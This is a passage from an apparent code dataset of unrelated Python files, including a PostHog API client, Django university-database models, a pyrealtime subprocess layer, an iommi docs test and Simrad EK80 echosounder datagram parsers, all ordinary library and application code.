1]\n create_test_submission('results.json', preds)\n\n\nif __name__ == \"__main__\":\n main('admin', 'toor')\n"} {"ext": "py", "sha": "1a3017e2047958a83cbc36b3be7ad231abdacfc8", "content": "import json\nimport logging\nfrom datetime import date, datetime\nfrom gzip import GzipFile\nfrom io import BytesIO\nfrom typing import Any, Optional, Union\n\nimport requests\nfrom dateutil.tz import tzutc\n\nfrom posthog.utils import remove_trailing_slash\nfrom posthog.version import VERSION\n\n_session = requests.sessions.Session()\n\nDEFAULT_HOST = \"https://app.posthog.com\"\nUSER_AGENT = \"posthog-python/\" + VERSION\n\n\ndef post(\n api_key: str, host: Optional[str] = None, path=None, gzip: bool = False, timeout: int = 15, **kwargs\n) -> requests.Response:\n \"\"\"Post the `kwargs` to the API\"\"\"\n log = logging.getLogger(\"posthog\")\n body = kwargs\n body[\"sentAt\"] = datetime.utcnow().replace(tzinfo=tzutc()).isoformat()\n url = remove_trailing_slash(host or DEFAULT_HOST) + path\n body[\"api_key\"] = api_key\n data = json.dumps(body, cls=DatetimeSerializer)\n log.debug(\"making request: %s\", data)\n headers = {\"Content-Type\": \"application/json\", \"User-Agent\": USER_AGENT}\n if gzip:\n headers[\"Content-Encoding\"] = \"gzip\"\n buf = BytesIO()\n with GzipFile(fileobj=buf, mode=\"w\") as gz:\n # 'data' was produced by json.dumps(),\n # whose default encoding is utf-8.\n gz.write(data.encode(\"utf-8\"))\n data = buf.getvalue()\n\n res = _session.post(url, data=data, headers=headers, timeout=timeout)\n\n if res.status_code == 200:\n log.debug(\"data uploaded successfully\")\n\n return res\n\n\ndef _process_response(\n res: requests.Response, success_message: str, *, return_json: bool = True\n) -> Union[requests.Response, Any]:\n log = logging.getLogger(\"posthog\")\n if not res:\n raise APIError(\n \"N/A\",\n \"Error when fetching PostHog API, please make sure you are using your public project token/key and not a private API key.\",\n )\n if res.status_code == 200:\n log.debug(success_message)\n return res.json() if return_json else res\n try:\n payload = res.json()\n log.debug(\"received response: %s\", payload)\n raise APIError(res.status_code, payload[\"detail\"])\n except ValueError:\n raise APIError(res.status_code, res.text)\n\n\ndef decide(api_key: str, host: Optional[str] = None, gzip: bool = False, timeout: int = 15, **kwargs) -> Any:\n \"\"\"Post the `kwargs to the decide API endpoint\"\"\"\n res = post(api_key, host, \"/decide/\", gzip, timeout, **kwargs)\n return _process_response(res, success_message=\"Feature flags decided successfully\")\n\n\ndef batch_post(\n api_key: str, host: Optional[str] = None, gzip: bool = False, timeout: int = 15, **kwargs\n) -> requests.Response:\n \"\"\"Post the `kwargs` to the batch API endpoint for events\"\"\"\n res = post(api_key, host, \"/batch/\", gzip, timeout, **kwargs)\n return _process_response(res, success_message=\"data uploaded successfully\", return_json=False)\n\n\ndef get(api_key: str, url: str, host: Optional[str] = None, timeout: Optional[int] = None) -> requests.Response:\n url = remove_trailing_slash(host or DEFAULT_HOST) + url\n res = requests.get(url, headers={\"Authorization\": \"Bearer %s\" % api_key, \"User-Agent\": USER_AGENT}, timeout=timeout)\n return _process_response(res, success_message=f\"GET {url} completed successfully\")\n\ndef shutdown():\n # Avoid logs with\n # sys:1: ResourceWarning: unclosed\n # \n # Should only be called when once, renders `_session` unusable\n _session.close()\n\nclass APIError(Exception):\n def __init__(self, status: Union[int, str], message: str):\n self.message = message\n self.status = status\n\n def __str__(self):\n msg = \"[PostHog] {0} ({1})\"\n return msg.format(self.message, self.status)\n\n\nclass DatetimeSerializer(json.JSONEncoder):\n def default(self, obj: Any):\n if isinstance(obj, (date, datetime)):\n return obj.isoformat()\n\n return json.JSONEncoder.default(self, obj)\n"} {"ext": "py", "sha": "1a3018eed7af9ecef4b593a07d12b4af7aa6c7f3", "content": "'''Tools for sensitivity analyses. I still need to read Lash & Fox to integrate more tools\nfor multiple bias analysis. This branch is still very much a work in progress. The goal is \nto simplify sensitivity analyses, in the hopes they become more common in publications\n\n-MonteCarloRR(): generates a corrected RR distribution based on binary confounder\n-trapezoidal(): generates a trapezoidal distribution of values\n'''\n\n\nfrom .Simple import MonteCarloRR\nfrom .distributions import trapezoidal\n"} {"ext": "py", "sha": "1a30197dc12d598d0dc6eeec07243d5c3a4e332a", "content": "from itertools import chain\n\nfrom Model.point import Point\n\nfrom View.itempriorities import ItemPriorities\n\nclass Cell:\n\tdef __init__ (self, pt):\n\t\tassert isinstance (pt, Point)\n\t\tself.pt = pt\n\t\t#self.neighbors = {}\n\t\t#self.items = {} # including walls and players\n\t\tself.players = []\n\t\tself.walls = [] # seems like too many walls\n\t\tself.items = []\n\t\t# TODO add floor and ceiling, so you can break through it\n\t#def setNeighbor (self, direction, cell):\n\t#\tself.neighbors[direction] = cell\n\tdef isTraversable (self):\n\t\tif len (filter (\n\t\t\tlambda (item): not item.isTraversable (),\n\t\t\tchain (self.players, self.walls, self.items))) is 0:\n\t\t\treturn True\n\t\treturn False\n\t\"\"\"\n\tdef getItemsOfType (self, T):\n\t\treturn chain.from_iterable (map (\n\t\t\tlambda (key): self.items.get (key),\n\t\t\tfilter (lambda (t): isinstance (t, T), self.items.keySet ())))\n\tdef getItems (self): return chain.from_iterable (self.items.values ())\n\t\"\"\"\n\t\n\tdef __repr__ (self):\n\t\tif len (self.itemViews) is 0: return '.'\n\t\treturn repr (self.items.values ())\n\tdef __str__ (self):\n\t\t#if len (self.items) is 0: return '.'\n\t\t#for priority in [Wall] + itemPriorities + [Item]:\n\t\t#\titems = filter (\n\t\t#\t\tlambda (item): isinstance (item, priority),\n\t\t#\t\tself.items)\n\t\t#\tif len (items) is 0: continue\n\t\t#\treturn str (items[0]) # some are not displayed\n\t\t#raise Exception (self.items)\n\t\t\n\t\tc = chain (self.players, self.walls, self.items)\n\t\treturn str (next (c, '.'))\n\t\t\n\tdef addPlayer (self, player):\n\t\tassert self.isTraversable ()\n\t\tassert self.pt == player.pt\n\t\tself.players.append (player)\n\tdef removePlayer (self, player):\n\t\tassert self.pt == player.pt\n\t\tassert player in self.players\n\t\tself.players.remove (player)\n\tdef containsPlayer (self, player):\n\t\tassert self.pt == player.pt\n\t\treturn player in self.players"} {"ext": "py", "sha": "1a30198251afc1ca2d19648163f92962b918a14d", "content": "# This is an auto-generated Django model module.\n# You'll have to do the following manually to clean this up:\n# * Rearrange models' order\n# * Make sure each model has one field with primary_key=True\n# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior\n# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table\n# Feel free to rename the models, but don't rename db_table values or field names.\nfrom django.db import models\n\n\nclass Address(models.Model):\n address_id = models.AutoField(primary_key=True)\n state = models.CharField(max_length=50)\n city = models.CharField(max_length=50)\n street = models.CharField(max_length=50)\n house_number = models.IntegerField()\n postal_code = models.IntegerField()\n\n class Meta:\n managed = False\n db_table = 'address'\n\n def __str__(self):\n return f\"{self.state}, {self.city}, {self.street}, {self.house_number}, {self.postal_code}\"\n\n\nclass Contact(models.Model):\n contact_id = models.AutoField(primary_key=True)\n person = models.ForeignKey('Person', models.DO_NOTHING)\n contact_type = models.CharField(max_length=20)\n value = models.CharField(max_length=50)\n last_change = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'contact'\n\n def __str__(self):\n return f\"{self.contact_type}, {self.value}\"\n\n def getType(self):\n return self.contact_type\n\n def getValue(self):\n return self.value\n\n\nclass Department(models.Model):\n department_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n decription = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'department'\n\n def getAll():\n return [str(qSet.name) for qSet in Department.objects.all()]\n\nclass DepartmentHasPerson(models.Model):\n department = models.ForeignKey(Department, models.DO_NOTHING)\n person = models.ForeignKey('Person', on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'department_has_person'\n\n\nclass DepartmentHasProgram(models.Model):\n department = models.ForeignKey(Department, models.DO_NOTHING)\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'department_has_program'\n\n\nclass Faculty(models.Model):\n faculty_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n address = models.ForeignKey(Address, models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'faculty'\n\n def getAll():\n return [str(qSet.name) for qSet in Faculty.objects.all()]\n\n\nclass FacultyHasDepartment(models.Model):\n faculty = models.ForeignKey(Faculty, models.DO_NOTHING)\n department = models.ForeignKey(Department, models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'faculty_has_department'\n\n\nclass FacultyHasPerson(models.Model):\n faculty = models.ForeignKey(Faculty, models.DO_NOTHING)\n person = models.ForeignKey('Person', on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'faculty_has_person'\n\n\nclass Person(models.Model):\n person_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=20)\n surname = models.CharField(max_length=20)\n birthdate = models.DateField()\n email = models.CharField(max_length=50)\n passwd = models.CharField(max_length=255)\n additional_note = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'person'\n\n def getId(self):\n return self.person_id\n\n def getName(self):\n return self.name\n\n def getSurname(self):\n return self.surname\n\n def getBirthdate(self):\n return self.birthdate\n\n def getEmail(self):\n return self.email\n\n def getPasswd(self):\n return self.passwd\n \n def getNote(self):\n return self.additional_note\n\n\nclass PersonHasAddress(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n address = models.ForeignKey(Address, models.DO_NOTHING)\n address_type = models.CharField(max_length=50, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'person_has_address'\n\n\nclass PersonHasRole(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n role = models.ForeignKey('Role', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'person_has_role'\n \n def __str__(self):\n return f\"{self.person} {self.role}\"\n\n\nclass PersonHasSubject(models.Model):\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n subject = models.ForeignKey('Subject', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'person_has_subject'\n\n\nclass ProgramHasPerson(models.Model):\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'program_has_person'\n\n\nclass ProgramHasSubject(models.Model):\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n subject = models.ForeignKey('Subject', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'program_has_subject'\n\n\nclass Role(models.Model):\n role_id = models.AutoField(primary_key=True)\n role_type = models.CharField(max_length=20)\n\n class Meta:\n managed = False\n db_table = 'role'\n\n def __str__(self):\n return self.role_type\n\n def getAll():\n return [str(qSet.role_type) for qSet in Role.objects.all()]\n\n\nclass StudyProgram(models.Model):\n program_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'study_program'\n\n def getAll():\n return [str(qSet.name) for qSet in StudyProgram.objects.all()]\n\nclass Subject(models.Model):\n subject_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n department = models.ForeignKey(Department, models.DO_NOTHING)\n description = models.CharField(max_length=255, blank=True, null=True)\n prerequisites = models.CharField(max_length=255, blank=True, null=True)\n semester = models.SmallIntegerField()\n review = models.SmallIntegerField(blank=True, null=True)\n additional_info = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'subject'\n\n def getAll():\n return [str(qSet.name) for qSet in Subject.objects.all()]\n\n\nclass Thesis(models.Model):\n thesis_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n thesis_type = models.CharField(max_length=20)\n description = models.CharField(max_length=255, blank=True, null=True)\n person = models.ForeignKey(Person, on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'thesis'\n\n def __str__(self):\n return self.name\n"} {"ext": "py", "sha": "1a3019cdaf96ced50b6083be38769453051442c7", "content": "from threading import Thread\n\nimport pyrealtime as prt\n\n\nclass SubprocessLayer(prt.TransformMixin, prt.ThreadLayer):\n def __init__(self, port_in, cmd, *args, encoder=None, decoder=None, **kwargs):\n super().__init__(port_in, *args, **kwargs)\n self.cmd = cmd\n self.proc = None\n self.read_thread = None\n self._encode = encoder if encoder is not None else self.encode\n self._decode = decoder if decoder is not None else self.decode\n\n def encode(self, data):\n return data + \"\\n\"\n\n def decode(self, data):\n return data.rstrip().decode('utf-8')\n\n def initialize(self):\n try:\n import pexpect.popen_spawn\n except ImportError:\n raise ModuleNotFoundError(\"pexpect required to use subprocess layers\")\n self.proc = pexpect.popen_spawn.PopenSpawn(self.cmd)\n self.read_thread = Thread(target=self.read_loop)\n self.read_thread.start()\n\n def read_loop(self):\n import pexpect\n while True:\n try:\n index = self.proc.expect(\".*\\n\")\n data = self.proc.match[index]\n self.handle_output(self._decode(data))\n except pexpect.exceptions.EOF:\n print(\"end of file\")\n return prt.LayerSignal.STOP\n\n def transform(self, data):\n self.proc.write(self._encode(data))\n return None\n"} {"ext": "py", "sha": "1a301a820e688d7a6e23162424700f051e650e8e", "content": "from tests.helpers import req\n\nrequest = req('get')\n\n\ndef test_extra_and_extra_evaluated():\n # language=rst\n \"\"\"\n extra and extra_evaluated\n =========================\n\n Very often it's useful to add some little bit of data on the side that you need\n later to customize something. We think it's important to support this use case\n with minimal amounts of code. To do this we have `extra` and `extra_evaluated`.\n This is your place to put whatever you want in order to extend iommi for a general\n feature or just some simple one-off customization for a single view.\n\n All `Part` derived classes have `extra` and `extra_evaluated` namespaces, for example:\n `Page`, `Column`, `Table`, `Field`, `Form`, and `Action`.\n\n You use `extra` to put some data you want as-is:\n\n .. code-block::\n\n form = Form.create(\n auto__model=Artist\n fields__name__extra__sounds_cool=True,\n extra__is_cool=True,\n )\n\n Here we add `sounds_cool` to the `name` field, and the `is_cool` value to the\n entire `Form`. We can then access these in e.g. a template:\n `{{ form.fields.name.extra.sounds_cool }}` and `{{ form.extra.is_cool }}`.\n\n `extra_evaluated` is useful when you want to use the iommi evalaution\n machinery to get some dynamic behavior:\n\n\n .. code-block::\n\n form = Form.create(\n auto__model=Artist\n fields__name__extra_evaluated__sounds_cool=lambda request, **_: request.is_staff,\n extra_evaluated__is_cool=lambda request, **_: request.is_staff,\n )\n\n These are accessed like this in the template: `{{ form.fields.name.extra_evaluated.sounds_cool }}`.\n \"\"\"\n"} {"ext": "py", "sha": "1a301d3f2eba522abf77c252be8a0724dae60b86", "content": "\"\"\"\nCode originally developed for pyEcholab\n(https://github.com/CI-CMG/pyEcholab)\nby Rick Towler at NOAA AFSC.\n\nThe code has been modified to handle split-beam data and\nchannel-transducer structure from different EK80 setups.\n\"\"\"\n\nimport logging\nimport re\nimport struct\nimport sys\nimport xml.etree.ElementTree as ET\nfrom collections import Counter\n\nimport numpy as np\n\nfrom .ek_date_conversion import nt_to_unix\n\nTCVR_CH_NUM_MATCHER = re.compile(r\"\\d{6}-\\w{1,2}|\\w{12}-\\w{1,2}\")\n\n__all__ = [\n \"SimradNMEAParser\",\n \"SimradDepthParser\",\n \"SimradBottomParser\",\n \"SimradAnnotationParser\",\n \"SimradConfigParser\",\n \"SimradRawParser\",\n]\n\nlog = logging.getLogger(__name__)\n\n\nclass _SimradDatagramParser(object):\n \"\"\"\"\"\"\n\n def __init__(self, header_type, header_formats):\n self._id = header_type\n self._headers = header_formats\n self._versions = list(header_formats.keys())\n\n def header_fmt(self, version=0):\n return \"=\" + \"\".join([x[1] for x in self._headers[version]])\n\n def header_size(self, version=0):\n return struct.calcsize(self.header_fmt(version))\n\n def header_fields(self, version=0):\n return [x[0] for x in self._headers[version]]\n\n def header(self, version=0):\n return self._headers[version][:]\n\n def validate_data_header(self, data):\n\n if isinstance(data, dict):\n type_ = data[\"type\"][:3]\n version = int(data[\"type\"][3])\n\n elif isinstance(data, str):\n type_ = data[:3]\n version = int(data[3])\n\n else:\n raise TypeError(\"Expected a dict or str\")\n\n if type_ != self._id:\n raise ValueError(\"Expected data of type %s, not %s\" % (self._id, type_))\n\n if version not in self._versions:\n raise ValueError(\n \"No parser available for type %s version %d\" % (self._id, version)\n )\n\n return type_, version\n\n def from_string(self, raw_string, bytes_read):\n\n header = raw_string[:4]\n if sys.version_info.major > 2:\n header = header.decode()\n id_, version = self.validate_data_header(header)\n return self._unpack_contents(raw_string, bytes_read, version=version)\n\n def to_string(self, data={}):\n\n id_, version = self.validate_data_header(data)\n datagram_content_str = self._pack_contents(data, version=version)\n return self.finalize_datagram(datagram_content_str)\n\n def _unpack_contents(self, raw_string=\"\", version=0):\n raise NotImplementedError\n\n def _pack_contents(self, data={}, version=0):\n raise NotImplementedError\n\n @classmethod\n def finalize_datagram(cls, datagram_content_str):\n datagram_size = len(datagram_content_str)\n final_fmt = \"=l%dsl\" % (datagram_size)\n return struct.pack(\n final_fmt, datagram_size, datagram_content_str, datagram_size\n )\n\n\nclass SimradDepthParser(_SimradDatagramParser):\n \"\"\"\n ER60 Depth Detection datagram (from .bot files) contain the following keys:\n\n type: string == 'DEP0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n transceiver_count: [long uint] with number of tranceivers\n\n depth: [float], one value for each active channel\n reflectivity: [float], one value for each active channel\n unused: [float], unused value for each active channel\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Depth datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"transceiver_count\", \"L\"),\n ]\n }\n _SimradDatagramParser.__init__(self, \"DEP\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n data_fmt = \"=3f\"\n data_size = struct.calcsize(data_fmt)\n\n data[\"depth\"] = np.zeros((data[\"transceiver_count\"],))\n data[\"reflectivity\"] = np.zeros((data[\"transceiver_count\"],))\n data[\"unused\"] = np.zeros((data[\"transceiver_count\"],))\n\n buf_indx = self.header_size(version)\n for indx in range(data[\"transceiver_count\"]):\n d, r, u = struct.unpack(\n data_fmt, raw_string[buf_indx : buf_indx + data_size] # noqa\n )\n data[\"depth\"][indx] = d\n data[\"reflectivity\"][indx] = r\n data[\"unused\"][indx] = u\n\n buf_indx += data_size\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n lengths = [\n len(data[\"depth\"]),\n len(data[\"reflectivity\"]),\n len(data[\"unused\"]),\n data[\"transceiver_count\"],\n ]\n\n if len(set(lengths)) != 1:\n min_indx = min(lengths)\n log.warning(\n \"Data lengths mismatched: d:%d, r:%d, u:%d, t:%d\", *lengths\n )\n log.warning(\" Using minimum value: %d\", min_indx)\n data[\"transceiver_count\"] = min_indx\n\n else:\n min_indx = data[\"transceiver_count\"]\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%df\" % (3 * data[\"transceiver_count\"])\n\n for indx in range(data[\"transceiver_count\"]):\n datagram_contents.extend(\n [\n data[\"depth\"][indx],\n data[\"reflectivity\"][indx],\n data[\"unused\"][indx],\n ]\n )\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradBottomParser(_SimradDatagramParser):\n \"\"\"\n Bottom Detection datagram contains the following keys:\n\n type: string == 'BOT0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n datetime: datetime.datetime object of NT date converted to UTC\n transceiver_count: long uint with number of tranceivers\n depth: [float], one value for each active channel\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Bottom datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"transceiver_count\", \"L\"),\n ]\n }\n _SimradDatagramParser.__init__(self, \"BOT\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n depth_fmt = \"=%dd\" % (data[\"transceiver_count\"],)\n depth_size = struct.calcsize(depth_fmt)\n buf_indx = self.header_size(version)\n data[\"depth\"] = np.fromiter(\n struct.unpack(\n depth_fmt, raw_string[buf_indx : buf_indx + depth_size]\n ), # noqa\n \"float\",\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n if len(data[\"depth\"]) != data[\"transceiver_count\"]:\n log.warning(\n \"# of depth values %d does not match transceiver count %d\",\n len(data[\"depth\"]),\n data[\"transceiver_count\"],\n )\n\n data[\"transceiver_count\"] = len(data[\"depth\"])\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%dd\" % (data[\"transceiver_count\"])\n datagram_contents.extend(data[\"depth\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradAnnotationParser(_SimradDatagramParser):\n \"\"\"\n ER60 Annotation datagram contains the following keys:\n\n\n type: string == 'TAG0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n text: Annotation\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 Annotation datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")]}\n\n _SimradDatagramParser.__init__(self, \"TAG\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n # if version == 0:\n # data['text'] = raw_string[self.header_size(version):].strip('\\x00')\n # if isinstance(data['text'], bytes):\n # data['text'] = data['text'].decode()\n\n if version == 0:\n if sys.version_info.major > 2:\n data[\"text\"] = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n data[\"text\"] = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"text\"][-1] != \"\\x00\":\n tmp_string = data[\"text\"] + \"\\x00\"\n else:\n tmp_string = data[\"text\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradNMEAParser(_SimradDatagramParser):\n \"\"\"\n ER60 NMEA datagram contains the following keys:\n\n\n type: string == 'NME0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n nmea_string: full (original) NMEA string\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 NMEA datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n nmea_head_re = re.compile(r\"\\$[A-Za-z]{5},\") # noqa\n\n def __init__(self):\n headers = {\n 0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")],\n 1: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\"), (\"port\", \"32s\")],\n }\n\n _SimradDatagramParser.__init__(self, \"NME\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Parses the NMEA string provided in raw_string\n\n :param raw_string: Raw NMEA strin (i.e. '$GPZDA,160012.71,11,03,2004,-1,00*7D')\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n # Remove trailing \\x00 from the PORT field for NME1, rest of the datagram identical to NME0\n if version == 1:\n data[\"port\"] = data[\"port\"].strip(\"\\x00\")\n\n if version == 0 or version == 1:\n if sys.version_info.major > 2:\n data[\"nmea_string\"] = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n data[\"nmea_string\"] = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n if self.nmea_head_re.match(data[\"nmea_string\"][:7]) is not None:\n data[\"nmea_talker\"] = data[\"nmea_string\"][1:3]\n data[\"nmea_type\"] = data[\"nmea_string\"][3:6]\n else:\n data[\"nmea_talker\"] = \"\"\n data[\"nmea_type\"] = \"UNKNOWN\"\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradMRUParser(_SimradDatagramParser):\n \"\"\"\n EK80 MRU datagram contains the following keys:\n\n\n type: string == 'MRU0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n heave: float\n roll : float\n pitch: float\n heading: float\n\n The following methods are defined:\n\n from_string(str): parse a raw ER60 NMEA datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"heave\", \"f\"),\n (\"roll\", \"f\"),\n (\"pitch\", \"f\"),\n (\"heading\", \"f\"),\n ]\n }\n\n _SimradDatagramParser.__init__(self, \"MRU\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Unpacks the data in raw_string into dictionary containing MRU data\n\n :param raw_string:\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return 